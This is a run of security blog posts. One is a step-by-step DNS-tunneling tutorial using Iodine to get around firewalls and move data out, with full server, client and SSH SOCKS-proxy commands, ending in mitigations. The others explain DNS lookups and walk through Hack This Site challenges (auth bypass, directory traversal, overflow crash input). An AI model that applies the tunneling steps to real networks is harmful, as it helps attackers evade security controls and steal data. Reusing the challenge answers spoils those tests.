Firewall Evasion with DNS Tunneling

Hello World and welcome to haxez. Today I want to talk about the DNS tunneling software Iodine. Or more specifically I want to talk about data exfiltration and firewall evasion via DNS encapsulation. If you haven’t read my article on DNS then I strongly recommend giving that a quick read-through beforehand.


Envision a scenario where you’ve successfully socially engineered your way into a super-secret evil organization. You’ve bypassed physical security and have found a sneaky corner office with an ethernet port. You plug your laptop into the network and the DHCP server assigns you an IP address. Next, you compromise a host and attempt to ping your external Command and Control center (C2). You ping your domain name. The ping returns the correct IP address for your domain name but your pings all time out… what do you do?


Why would ping be able to resolve your domain names IP address but not be able to ping it? Other than the obvious ICMP packets being blocked, it could be that the network administrator has blocked all traffic except DNS. This is a common configuration to allow DNS resolution on the network, but fortunately, it is also susceptible to abuse. By using the DNS tunneling software Iodine, we can establish a tunnel to an external host and use it as a proxy to the internet.

Initial Set Up

In order to perform this type of attack, you will need an external server capable of running Iodine. Iodine should be compatible with most Linux distributions but for this demonstration, I’m going to be using a Debian-based cloud server. Furthermore, You will also need your own domain name and access to edit the DNS records for that domain. Finally, you will need a Linux machine to launch your attack. As you can see from the screenshot below, my IP address is currently set to (it’s a VPN before you ask).

Pre Iodined What Is My IP DNS
Pre Iodined What Is My IP

Iodine DNS Configuration

For this demonstration, I’m going to be using my spare domain It is currently registered with google and is using their nameservers. I don’t use the domain for anything, I bought it on a whim and am now deciding to do something with it. In order for Iodine to work, we need to create some records so that the Iodine server and client can communicate. As you can see from the screenshot below, I have created an A record of dnstunip which points to my Debian server’s IP address of I then create an NS (nameserver) record of dnstun and point it to the A record (

Iodine Domain Name DNS Configuration
Iodine Domain Name DNS Configuration

Iodine Server Configuration

On Debian, Iodine can be installed by simply running apt-get install iodine. That’s it, that’s all the installation you need to do unless Iodine isn’t found in the repositories. If that happens, you can clone it directory from the GitHub repository but they have documentation on how to do that. Once Iodine is installed you need to tell it to start listening for DNS queries for your domain. In order to do this, you need to run iodined (the server-side software). As you can see from the screenshot below I have started iodined and set the password of SecretPassword1337, the local IP address of, and the domain of The local IP address is the IP address that the DNS tunnel is going to use to communicate with the client.

sudo iodined -f -c -P SecretPassword1337
DNS Iodine Server Configuration
Iodine Server Configuration

You should now be able to check that your Iodine server is set up correctly by visiting and popping in your domain name.

Iodine DNS Server Check
Iodine Server Check

Iodine Client Configuration

Once you have the server running, head back to your client and with sudo, run:

sudo iodine, -f -P SecretPassword1337

Where the password is your password and the is your domain. This will then send DNS queries to the server to determine whether it can communicate with it. The client and server will then determine the upstream and downstream configurations and finally create the tunnel. The client should now have a new network interface called dns0 or something similar. The IP address of that interface will be set to an IP within the range that you specified on the server (10.0.0.X). That’s it, you now have a connection to the server. You can SSH into it and communicate with the outside world.

Iodine Client Configuration
Iodine Client Configuration

It’s also worth launching Wireshark and watching the DNS traffic being sent and received. It is quite bizarre seeing the length of some of the requests and responses. You can see from the screenshot below that the DNS traffic isn’t normal. However, Wireshark doesn’t seem to think there is a problem with it and unless there are devices on the network configured to look for this type of traffic then it probably won’t get flagged.

Wireshark PCAP looking at DNS
Wireshark PCAP

The Cherry On Top

Ok, but what if you want to browse the internet while you have this DNS tunnel established? There’s an SSH trick for that. If you SSH to the DNS tunnel servers IP address ( and specify a few arguments, you can dynamically port forward traffic to your localhost. This means that by setting a proxy configuration in your browser to localhost and the specified port, you can browse the web. The command is:

sudo ssh -N -D 9090 [email protected]

where is the IP address of the server’s DNS tunnel IP and 9090 is the local port you want to forward to. The -N argument just means no command execution and the -D argument is the dynamic port forwarding flag that makes the magic happen.

SSH Dynamic Port Forwarding
SSH Dynamic Port Forwarding

Iodine Browser Configuration

Once that’s done, you can head to your browser’s proxy settings and manually configure a SOCKS proxy on the specified port. Save the changes and you should now be able to browse the web. As you can see from the screenshot below, I have created the SOCKS proxy and when visiting the what is my IP website, it tells me that my IP address is now the IP address of our Debian cloud server.

Setting Up Browser SOCKS Proxy
Setting Up Browser SOCKS Proxy
Iodined What Is My IP
Iodined What Is My IP

DNS Concerns

So why is this a problem? Well, it’s using DNS to exfiltrate data out of an otherwise restricted network. There are plenty of places such as banks, prisons, and other government facilities where internet access might be restricted for genuine reasons. These places do not want sensitive information to escape their network. Banks don’t want their client’s data stolen, prisons don’t want their inmates communicating with the outside world and governments don’t want their secrets leaked. Additionally, if a hacker were able to implant an easily concealed device into a network it could act as a backdoor into that network. This is also how some malware communicates back to the command and control center to receive instructions.

DNS Mitigations

How do you mitigate a service that is behaving as it is expected to? Well, there are actually a number of options. First, you could add domain allow and block lists to your configuration. By blocking known malicious domain names, you ensure that a DNS tunnel can’t be established to that domain name. However, a hacker could just register a new domain name and use that. A better approach is to use an allow list whereby only traffic from specific domains is allowed into the network.

An even better approach is to implement a device that performs traffic/packet inspection. There are a number of devices out there that will identify malicious DNS traffic and block it. You saw from the Wireshark screenshots that the DNS tunnel traffic stands out like a sore thumb. It is easily distinguishable from genuine DNS traffic.

DNS Conclusions

I thought this was a fantastic technique when I first come across it. A colleague/friend of mine recommend it to me while I was on an engagement and sure enough, it worked. I was shocked as I didn’t think it would be possible to encode data like that into DNS queries. You can have a full-blown conversation with another computer by smuggling it through DNS.

DNS Simplified

Hello world, and welcome to haxez. Today I want to talk about the Domain Name System (DNS). I know, I know, most of you probably already know how DNS works. However, I’m going to be writing an article soon about Firewall Evasion and Data Exfiltration through DNS Tunnelling and I needed to brush up on my DNS knowledge. Never wanting to waste an opportunity, I thought it would make for a good blog post and video so here we are.

What is DNS?

Domain Name System or DNS is a hierarchical system for translating text to IP addresses. It relies on various nameservers at various levels. A nameserver is a server that holds records for domains whether they are top-level domains (TLD) or fully qualified domains (FQDN). At the very top of the hierarchy are the root servers. These root servers hold the DNS record information for the top-level domains. This information is stored in something called a zone file. You can perform a DNS zone transfer using various tools. The example below is using Nmap.

sudo nmap --script dns-zone-transfer.nse --script-args -p53
DNS Zone File
DNS Zone File

The zone file contains entries such as the nameservers for the top-level domains. Underneath the root nameservers are the top-level domain nameservers. The same principle applies here in that the top-level domain nameservers contain information about the fully qualified domain nameservers. At the bottom of the hierarchy is the domain’s authoritative nameservers which contain records such as A, MX, NS, TXT, and many others.

DNS is a hierarchical system
DNS is a hierarchical system

Domain Structure

If we look at the web address we can see that it has multiple sections. You may not know about the first section as it doesn’t tend to be represented by anything. In some cases, it can be represented by a full stop but most Domain Name System nameservers don’t require the full stop in order for it to work. The full stop comes at the end of the ‘.ORG’ section and signifies a root nameserver. Root nameservers hold the IP addresses of the top-level domain (TLD) (COM, NET, ORG,) nameservers. The ‘ORG’ section of the address is a top-level domain. The ‘haxez’ portion of the address is the domain. Anything that comes before would be a subdomain. For example, where www is the subdomain, and haxez is the fully qualified domain.

Domain Structure
Domain Structure

How Does The DNS Work?

When you type a URL into your browser a number of things happen. Using various online resources I’ve broken it down into 10 steps. I’ve overly simplified the process but there is a lot more going on such as caching, virtual host magic, TCP handshakes, and GET requests.

  1. The client queries the DNS resolver for the location of the domain name,
  2. The DNS resolver queries a root nameserver for the location of the top-level domain (.COM, .ORG, .CO.UK, .NET) nameserver,
  3. The root nameserver responds to the DNS resolver with the IP address of the top level domain nameserver,
  4. The DNS resolver then queries the top level domain nameserver for the location of the domain’s authoritative nameserver,
  5. The top-level domain nameserver tells the DNS resolver the IP address of the authoritative nameserver.
  6. The DNS Resolver then queries the authoritative nameserver for the IP address of the domain.
  7. The authoritative nameserver tells the DNS resolver the IP address of the domain,
  8. The DNS resolver responds back to the client with the IP address of the domain,
  9. The client then sends the request to the target IP address,
  10. The target IP address would then respond with the information the client requested.
How DNS Works
How DNS Works

DNS Demonstration

Let’s start at the top! using the tool nslookup we can query the root nameservers. We simply set the type of query to the nameserver and then use a full stop to specify the root servers. As you can see from the output below, nslookup returns all the root server nameservers.

└──╼ $nslookup
> set type=ns
> .
Non-authoritative answer:
. nameserver =
. nameserver =
. nameserver =
. nameserver =
. nameserver =
. nameserver =
. nameserver =
. nameserver =
. nameserver =
. nameserver =
. nameserver =
. nameserver =
. nameserver =
Authoritative answers can be found from:

In order to query the root server nameservers, we need to find out what their IP addresses are. In order to do that we set the query type to an A record. An A record translates a word to an IP address.

> set type=a

Non-authoritative answer:

Next, we need to find the nameservers of the top-level domain. In order to do that, we first set our server to the IP address that we just obtained from our A record query. Next, we set the record type to the nameserver and then query the “.COM” top-level domain. However, ensure you put a full stop after it.

> server
Default server:
> set type=ns
> com.

;; Truncated, retrying in TCP mode.
Non-authoritative answer:
*** Can't find com.: No answer
Authoritative answers can be found from:
com nameserver =
com nameserver =
com nameserver =
com nameserver =
com nameserver =
com nameserver =
com nameserver =
com nameserver =
com nameserver =
com nameserver =
com nameserver =
com nameserver =
com nameserver = internet address = has AAAA address 2001:502:1ca1::30 internet address = has AAAA address 2001:503:231d::2:30 internet address = has AAAA address 2001:502:7094::30 internet address = has AAAA address 2001:501:b1f9::30 internet address = has AAAA address 2001:503:39c1::30 internet address = has AAAA address 2001:503:d414::30 internet address = has AAAA address 2001:503:a83e::2:30 internet address = has AAAA address 2001:503:eea3::30 internet address = has AAAA address 2001:502:8cc::30 internet address = has AAAA address 2001:500:d937::30 internet address = has AAAA address 2001:503:d2d::30 internet address = has AAAA address 2001:503:83eb::30 internet address = has AAAA address 2001:500:856e::30

We get a lot of results but we should be able to set any of these to our DNS resolver in order to query it for a specific domain nameserver. Set the server to one of the IP addresses listed above and then set the type to nameserver again. Then, choose a domain and punch It in to find its nameservers.

> server
Default server:
> set type=ns
Non-authoritative answer:
*** Can't find No answer
Authoritative answers can be found from: nameserver = nameserver = nameserver = nameserver = has AAAA address 2001:4860:4802:34::a internet address = has AAAA address 2001:4860:4802:32::a internet address = has AAAA address 2001:4860:4802:36::a internet address = has AAAA address 2001:4860:4802:38::a internet address =

Finally, we can now set our DNS resolver to one of googles nameservers and query it to find A records such as mail. This could of course be scripted to automatically run through each of these steps automatically and perform a subdomain brute force attack against the servers. I believe there is already a tool called Fierce that does exactly that.

> server
Default server:
> set type=a


I know this isn’t hacking but it’s essential to have a good understanding of the technologies that make the internet and the world wide web possible. There is a lot more to DNS than I’ve covered here. I haven’t discussed the various record types like MX, TXT, and CNAME that can be added to a zone file. I haven’t talked about propagation and caching.

DNS is such as fascinating subject to study because the problem is always DNS. Joking aside, without DNS we would have to remember the IP addresses of every website we wanted to visit. Oh, and those root servers at the top of the tree, if they go down then so does the internet. No more name resolution means anything that has been developed with resources being pulled via domain names will no longer work. It’s a terrifying prospect, especially with all the recent talk of cyber armageddon from the World Economic Forum. If someone with a zero-day were to get into those root servers and mess up the zone files then it would cause chaos. Hopefully, there is some hidden redundancy and backups to mitigate that possibility. Those 13 nameservers are the unsung heroes of the internet and to them I say, thank you. Keep computing away you absolute legends.

Hack This Site: Extended Basic – Mission 6

Hello World and welcome to haxez, today we’re going to be looking at Hack This Site Extended Basic 6. Solving this challenge requires some basic knowledge of PHP or any other language for that matter. It’s a simple challenge that shows how poorly coded web application authentication mechanisms can be bypassed.

The Extended Basic 6 Challenge

The image below shows the PHP that makes up the authentication mechanism. Furthermore, This is the code that we need to exploit in order to bypass the authentication mechanism. The introduction text at the top explains that the sysadmin is a noob and that the script is located at Therefore, to solve this challenge we need to append the correct syntax to the end of the URL and submit it to the submission form.

Extended Basic 6 The Code
The Code

The PHP Code

The snippet below is the exact code we’re going to be exploiting. Furthermore, there is no backend database to worry about, just some simple PHP logic that we can leverage for our own nefarious purposes.

$user = $_GET['user'];
$pass = $_GET['pass'];
if (isAuthed($user,$pass))
if ($passed==TRUE)
echo 'you win';
<form action="me.php" method="get">
<input type="text" name="user" />
<input type="password" name="pass" />
function isAuthed($a,$b)
return FALSE;

Breaking Down The Code

We’re going to break the code down line by line in order to solve this challenge. Once we understand what the code is doing, we will be able to use its own logic against it and bypass authentication.

First, the code starts with it a tag telling us what language it is.


Next, we have two variables being set from user input. The $user and $pass variables are populated by the values of ‘user’ and ‘pass’. This is more evident later on when looking at the HTML form.

$user = $_GET['user'];
$pass = $_GET['pass'];

This is where the logic beings. When the user submits their username and password, the data is passed to an if statement. If the values of the variables ‘$user’ and ‘$pass’ are correct then the variable ‘$passed’ is set to true.

if (isAuthed($user,$pass))

After that, the application uses another if statement to check whether the value of the variable ‘$passed’ is set to true. If ‘$passed’ is set to true then the application echos out “you win”. This also ends the first section of PHP.

if ($passed==TRUE)
echo 'you win';

Now, we move on to the HTML. This is the login form that the user will send when loading the page in their browser. It is fairly standard and just performs a get request to me.php. The contents of the get request or the values of the input for ‘user’ and ‘password’. The user input type is text and the password input type is password.

<form action="me.php" method="get">
<input type="text" name="user" />
<input type="password" name="pass" />

Finally, we have the last section of PHP. This is the function that checks to see whether the username and password are correct. This function compares the values of variables ‘$user’ and ‘$pass’ with the variables ‘$a’ and ‘$b’. If they match then it is the first if statement is executed.

function isAuthed($a,$b)
return FALSE;

The Extended Basic 6 Solution

With that rather long explanation out the way, we can now move on to solving the challenge. It’s pretty simple if you know how to PHP site URL’s work. We know that in order for us to authenticate, the variable ‘$passed’ needs to be set to ‘TRUE’

PHP allows you to specify variables and their contents in the URL. For example, a dynamic PHP website using a CMS like WordPress may have a URL like HTTP:// The question mark indicates that what follows is a variable and in this case, the variable is ‘$page’. Furthermore, we can specify that we want the value of the page variable to be 1.

With this in mind, we can take the provided URL of HTTP:// and append a question mark followed by the variable passed equals TRUE, as seen below.

Submitting this to the input box will solve the challenge.

Hack This Site: Extended Basic – Mission 5

Hello world, welcome to HaXeZ where today we will be looking at the Hack This Site Extended Basic mission 5. This mission is another programming mission that requires you to review the contents of a PHP file and then subsequently a shell script that is used to edit the PHP file. There is an error in the shell script that prevents it from doing what it’s supposed to do. We need to fix it.

The Extended Basic 5 Code

The image below shows the code that Sam has written. The introduction message advises that Sam created a function called safeeval to run commands. However, on the page, he neglected to use safeeval and use eval() instead. Furthermore, it explains that he wrote a shell script to go through the PHP file and replace all values of eval() with safeeval. Unfortunately, there is an error in the shell script that prevents the script from working.

Extended Basic 5 The Code

The PHP Code

include ('');
if ($access=="allowed") {
if (!empty($_GET['cmd2'])) {

The Shell Script

rm OK
sed -E "s/eval/safeeval/" <exec.php >tmp && touch OK
if [ -f OK ]; then
rm exec.php && mv tmp exec.php

Hack This Site Extbasic 5 Code Breakdown

We don’t need to break down the PHP code as that is the code we’re trying to amend with the shell script. So let’s break the shell script down line by line.

First, as with all shell scripts, we get a comment to explain that it is in fact a shell script. Nothing out of the ordinary here.


Next, we have the ‘rm’ command which on Linux means to remove something and after a bit of research, it appears that it is the same on FreeBSD too. So this line is saying remove ok.

rm OK

The next line is using the sed (stream editor) command which appears to be what is substituting eval for safeeval. It is then passing the exec.php file to the sed command using a less than sign. After that, it appears to be taking the results of the sed command and appending them to ‘tmp’ and creating a file.

sed -E "s/eval/safeeval/" <exec.php >tmp && touch OK

Next, we appear to have some logic that checks if the command executed ok, and if it did it moves on to the next line.

if [ -f OK ]; then

Finally, the script removes exec.php and moves tmp to exec.php.

rm exec.php && mv tmp exec.php

Hack This Site Extbasic 5 Solution

The final line is the end of the if statement so we don’t need to explain that any further. Upon closer inspection and reading the Wikipedia page for sed it appears substitutions with sed requires 2 characters. First, it explains that in some cases you need to start the argument with -E. This is true on MacOS which is a variant of free BSD. We know Sam is using free BSD so the -E at the start of his sed statement is correct. However, we also need the characters s and g. The s character tells sed to substitute one word for the other (eval with safeeval). The g character tells it to do it globally. In short, Sam needs a g at the end of his sed statement to replace all instances of eval with safeeval. The correct syntax should be as follows.

sed -E "s/eval/safeeval/g" <exec.php >tmp && touch OK

Without the g, the script only replaces one instance of eval. The script has multiple instances of eval so the script fails to complete its purpose. Fun challenge.

Hack This Site: Extended Basic – Mission 4

Hello world, welcome to haxez where today we will be looking at the Hack This Site Extended Basic mission 4. This mission is another programming mission that requires you to examine the source code of an application to determine its output. Again, please be advised that I’m terrible at programming so my explanation might be terrible.

The Extended Basic 4 Code

The image below shows the introduction message and explains that sometimes we may need to decipher a language. Furthermore, it explains that sometimes the language may not be on google or encrypted in some way.

Below that we can see there appears to be a user input of the numbers 6 and 7.

Extended Basic 4 Code
Extended Basic 4 Code

We then have a number of lines of code that appear to perform operations on the user-submitted values.

The Solution

As with Extended Basic 3, I’m going to attempt to break this down line by line and explain what is happening.


This appears to be the start of the program. I don’t think there is much more to it than that other than indicating the start of the program.

var int as in

What this appears to be doing is assigning whatever value the user has submitted to the variable var. The ‘in’ is the user input and var is the variable name. In this case, the value will be 6.

int var as in

This is similar to the line above and is assigning whatever the user submits to a variable called ‘int’. Again the ‘in’ part of the statement appears to be the user input prompt. In this case, the value will be 7.

out var int

Finally, the script is printing or echoing both the variables ‘var’ and ‘init’ to the screen meaning it should output 67.

Extended Basic – Mission 4 Conclusion

I can’t think of any other way to solve this or what any of the other parts of the code would be doing, other than what I have explained. I hope this has helped you solve the challenge. Feel free to check out parts 1 to 3 and drop by my youtube channel and subscribe.

Hack This Site: Extended Basic – Mission 3

Hello world and welcome back to haxez, thank you for surfing by. This post is a walkthrough of the Hack This Site Extended Basic Mission 3. The purpose of this challenge is to deduce the function of a bespoke programming language’s application. A basic understanding of programming and assigning variables is required for this challenge. However, I’m terrible at programming and was still able to solve the challenge.

The Extended Basic 3 Function

As mentioned above, the image below informs the user that the challenge creator has created a bespoke programming language. In order to solve the challenge, we need to walk through the application step by step and determine the output.

Extended Basic 3 Challenge

Therefore, I believe the best method of solving this challenge is to analyse each line individually and identify what it is doing.

The Solution

BEGIN notr.eal

Firstly, the application starts with ‘BEGIN notr.eal’. Granted, this appears fairly self-explanatory and denotes the start of the application.


Secondly, it appears as though the application is creating an integer with the value of 2. However, as with other programming languages, the position of ‘CREATE’ suggests it is more likely that the integer value of 2 is being assigned to the variable ‘CREATE’.


Thirdly, the same can be said about the ‘DESTROY’ variable. This could easily be mistaken for a function of the program. However, since this function isn’t previously described in the program, I’m going to assume that an integer value of 0 is being added to the variable ‘DESTROY’.

ANS var AS Create + TO

Fourthly, it would appear that the value of the ‘create’ variable (currently 2) or ‘CREATE’ as previously written is being add to the ‘TO’ variable. I’m not too sure about this one but it resulted in the correct answer so my logic (however flawed) seems correct.

out TO

Finally, the value of the ‘TO’ variable is printed out to the screen. So in this instance the answer should be 2. If you submit that to the submission box then it should solve the challenge.

BEGIN notr.eal /* Starts the program
CREATE int AS 2 /* Adds the integer 2 to variable 'CREATE'
DESTROY int AS 0 /* Adds the integer 0 to variable 'DESTROY'
ANS var AS Create + TO /* Appears to take the value of variable 'CREATE' and adds to varable 'TO'
out TO /* Prints the value of 'TO'

Extended Basic Mission 3 — Conclusion

While my explanation might be incorrect, it resulted in the correct answer. Furthermore, I tried to solve the challenge in other ways but wasn’t able to. If we break the program down again and look at lines 2 and 3 we could infer that the program is simply creating an integer of 2 and then destroying it. If it destroys the integer then the value of the variable ‘TO’ would be 0 which is the wrong answer. I’ve also looked at whether ‘AS’ could be a variable but we end up with the same result of the value of the variable being destroyed and ending up with 0. There could be something else I’m missing and if you spot it then please let me know. Anyway this was a fun challenge, please check out my other posts in this series ExtBasic1 and ExtBasic2.

Hack This Site: Extended Basic – Mission 2

Hello world, welcome to haxez where we will be covering Hack This Site Extended Basic Mission 2. This challenge is fairly simple provided you have an understanding of application structures. It requires us to slightly modify the provided script in order to access the index.php page at the root of the web application. In order to do that we need to perform a directory traversal up two directories to grab the index.html page.

The Extended Basic 2 Function

As you can see from the screenshot below, we have some fairly basic PHP code that is attempting to get the contents of the filename specified by the value ‘filename‘. Furthermore, it specifies the type of extension for the filename which in this case is ‘.php‘. Underneath the code, we have a submission box where we need to submit the solution to the challenge.

Extended Basic 2 The Function
The Function

The Solution

Given these points, all we need to do to solve this mission is to tell the script to navigate up two directories. We are currently in the ‘extbasic‘ directory looking at the file named 2 ‘/missions/extbasic/2‘. So by traversing up two directories we should be in the root directory. Once there, we need to specify the ‘index.php‘, however the file extension ‘.php‘ has already been appended for us so we only need to specify the word index. The correct solution should be ‘../../index‘. Paste that into the check form and you should complete the mission and be able to proceed on to the next one.

The Solution
The Solution

Extended Basic Mission 2 — Conclusion

This is a simple but fun challenge that tests your knowledge of web application directory structures and code reading ability. While I wouldn’t have a clue how to write this off the top of my head, I easily worked out what the code is attempting to do. Once you understand what the code is doing, and you understand the rules of the mission then it’s fairly simple. This type of attack is known as a directory traversal attack and can be prevented by validating user input and by having strict permissions policies on directories. Anyway, I hope this helped you solve the mission.

Hack This Site: Extended Basic – Mission 1

Hello and welcome to haxez where today we’re looking at Hack This Site Extended Basic Mission 1. The mission is titled “Over and Over?” and requires you to perform a buffer overflow to complete it. Upon navigating to the mission we are greeted with a message that explains that we have a C program that calculates the length of the user input. It goes on to explain that we need to crash the program. It also provides us with the source code of the application.

Extended Basic 1 Missions
Extended Basic Missions

Extended Basic 1 – Source Code

I’m not going to pretend I know the ins and outs of the C programming language. It was a bit before my time so I’ve never learned it. However, If we look at the source code we can see that it is declaring a standalone function using the void statement. Furthermore, we can deduce that there is a character limit of 200 hundred characters as stated with the ‘char lol [200]‘ line. Taking this into consideration, we can safely assume that inputting more than 200 characters would likely cause an error.

Extended Basic 1 The Source Code
The Source Code

Extended Basic 1- Buffer Overflow

A buffer overflow occurs when you send more data than is expected to an application. Essentially, each part of a program has an allocated amount of system memory. If you were to send more data to the application than the application has allocated memory for, unexpected results happen. This will likely cause the application to crash but in some cases, it could allow for code execution. However, the purpose of this mission is to crash the application. We know the application is expecting 200 characters. So if we generate 250 characters with our terminal using ‘printf 'A%.0s' {1..250}‘ and submit it to the application, we should crash it.

Terminal — Creating Payload
Terminal — Creating Payload

Mission Complete

Now if we copy and paste that string into the application submission box and click submit, we should see it process and complete the mission. We can tell the mission is complete because it should generate a blue Go On button underneath the input form.

Mission Complete
Mission Complete

Hack This Site: Javascript Mission – Level 7

Hell world, welcome to haxez. We have done it, we have made it to the Javascript 7 mission or the last Javascript mission on Hack This Site. After all those other missions I feel like I’m a scripting savant. Ok maybe not, but progress is progress. Furthermore, once we have completed this mission, we can move on to other more exciting missions. This mission is a lot like one of the previous missions that we did. However, instead of the password being encoded or obfuscated, this time the whole script is obfuscated.

Javascript 7 Mission description
JS Obfuscation FTW

Javascript 7 Introduction

Navigating to the mission we can see a password input form. There isn’t much more information than that other than the title and a thank you message to the creator. If we submit test data to the password input form then we will get an incorrect error message. In order to see what’s going on, we need to view the page source of the application.

Javascript 7 Password Submission Form
Password Submission Form

The Javascript

As you can see from the image below, the script appears to be garbled data. It’s all X’s followed by two-digit numbers. We could attempt to decode it online but there is a far easier solution. All we need to do is to right-click the Check Password button and inspect the functionality behind that.

Obfuscated Javascript
Obfuscated Javascript

The Button Javascript

As you can see from the screenshot below, inspecting the button shows us the Javascript that is powering it. The Javascript is checking the value of user-submitted value ‘pass‘ to see whether it matches the value ‘j00w1n‘. If the values match then we get an alert saying “You WIN!”. If it doesn’t match then we get a message saying “WRONG! Try Again”.

The Button — Javascript
The Button — Javascript

The Javascript 7 Solution

Therefore, in order to complete this mission and to complete the Javascript series. All you need to do is submit the value ‘j00w1n‘ to the password form. As you can see from the image below, we get the alert box that tells us that we have successfully completed the mission.

The Solution
The Solution

Alernative Method

I’m sure the developers didn’t intend for this mission to be this easy. I fully believe that they wanted us to deobfuscate the code. So for that reason, the screenshot below shows me deobfuscating the code using the GCHQ tool CyberChef. As you can see from the screenshot, the output shows the button value with the password.


Hack This Site: Javascript Mission – Level 6

Hello world, welcome to haxez where today we’re going to solve Javascript Mission 6 on Hack This Site. This challenge isn’t too difficult provided you pay attention to the details. The mission takes the script from a previous mission and attempts to distract you with it. However, hidden on another page of the application is the correct script that is being used to authenticate.

Javascript 6 go go away .js
go go away .js

The Javascript 6 Mission

Navigating to the mission we see the expected password submission form. However, instead of Faith, this time we have a message saying that Fiftysixer has decided to try creating some Javascript. It explains that he forgot to remove the previous code. This has made the new code more confusing but apparently, Fiftysixer likes it that way. We can submit test data to the form but we get an incorrect error message.

The Password Form
The Password Form

The Javascript

If we view the Javascript we can see that it looks a lot like the script we had for a previous mission. This script tried to trick us by comparing a variable with a string rather than assigning the string to the variable. The solution to that mission was ‘moo'. However, if we submit ‘moo‘ to the password form, we still get an incorrect error message. Notably, there is a link to what appears to be another Javascript file called checkpass.js. Furthermore, the name suggests that it may have something to do with the password checking functionality.

The Javascript
The Javascript

The Real Javascript

If we navigate to the script in the URL we can see that it does appear to be the correct script for checking the password. As you can see from the image below, the javascript is declaring three variables and assigning them values.

moo = "pwns";
rawr = "moo";

I’m not too familiar with Javascript syntax but I wonder whether the lack of spaces in the declaration of ‘dairycow‘ is significant in any way. After the variable declaration, we have a function to check the password. It states that if the value submitted by the user is the same as the value of ‘rawr‘ and ‘moo‘ then we win. If not then we lose. It is important to note that there are also speech marks between ‘rawr‘ and ‘moo‘ so we need to ensure that we have a space in our submission.

The Real Javascript
The Real Javascript

The Javascript 6 Solution

So that’s all we need to do to solve the mission. Submit ‘moo pwns‘ as the password and you should complete the mission. Congratulations.

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How did you do that